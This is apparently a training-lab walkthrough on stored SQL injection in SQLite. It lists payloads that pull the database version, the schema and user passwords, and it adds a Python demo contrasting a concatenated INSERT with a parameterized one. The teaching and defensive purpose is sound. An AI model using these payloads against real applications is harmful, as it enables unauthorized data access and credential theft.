SQL Injection - Stored (SQLite) - Low Security Level
Solution:
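Step 1. Enter ' and click on Add Entry. Check the output - The entry was added to our blog!
Note: No changes are displayed anywhere on the page.
Let's test the lesson with '' as an entry and check the results - Now the entries are displayed. Check the output: instead of '', only ' is displayed. In SQL, '' inside a quoted string is an escaped single quote, so the input is reaching the query inside a string literal without being escaped.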
Step 2. Use the payloads below to test the lesson. Click on Add Entry after entering each payload.
Note: You can modify the prefix of the payload to any name or keep it blank as shown in the video.
Payloads:
PseudoTime',(select sqlite_version())) --
',(select tbl_name from sqlite_master limit 1,1))--
',(select sql from sqlite_master where tbl_name='users'))--
',(select id from users limit 0,1))--
',(select login from users limit 0,1))--
',(select password from users limit 0,1))--
Note: When you click on Delete Entries, all your entries will be deleted.
Explore the lesson with other payloads.
PseudoTime
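Why Step 1 and the first Step 2 payload behave as they do, as an added example (not part of the original walkthrough or the lab's own code): an INSERT built by string concatenation next to the parameterized form that stores the same input as plain text. The simplified blog table, the function names and the owner value bee are assumptions.

```python
import sqlite3

# First Step 2 payload, copied from the walkthrough above.
PAGE_PAYLOAD = "PseudoTime',(select sqlite_version())) --"

def make_db():
    # Assumed, simplified schema: the entry text followed by one more column.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE blog (id INTEGER PRIMARY KEY, entry TEXT, owner TEXT)")
    return db

def add_entry_vulnerable(db, entry, owner="bee"):
    # Vulnerable pattern: user input is concatenated into the statement text.
    sql = "INSERT INTO blog (entry, owner) VALUES ('" + entry + "','" + owner + "')"
    try:
        db.execute(sql)
        return True
    except sqlite3.Error:
        # A lone ' unbalances the quotes; the statement fails and nothing is stored.
        return False

def add_entry_safe(db, entry, owner="bee"):
    # Hardened pattern: placeholders keep the input as data, never as SQL.
    db.execute("INSERT INTO blog (entry, owner) VALUES (?, ?)", (entry, owner))
    return True

def rows(db):
    return db.execute("SELECT entry, owner FROM blog ORDER BY id").fetchall()

if __name__ == "__main__":
    weak = make_db()
    for text in ("'", "''", PAGE_PAYLOAD):
        print("vulnerable", repr(text), "stored:", add_entry_vulnerable(weak, text))
    # '' is stored as a single ', and the payload's subquery result lands
    # in the owner column instead of the application's own value.
    print(rows(weak))

    hardened = make_db()
    for text in ("'", "''", PAGE_PAYLOAD):
        add_entry_safe(hardened, text)
    # Every input is stored exactly as typed; owner stays 'bee'.
    print(rows(hardened))
```

A code review or static check for this class of bug looks for quote characters concatenated around request parameters in INSERT statements, not only in SELECT.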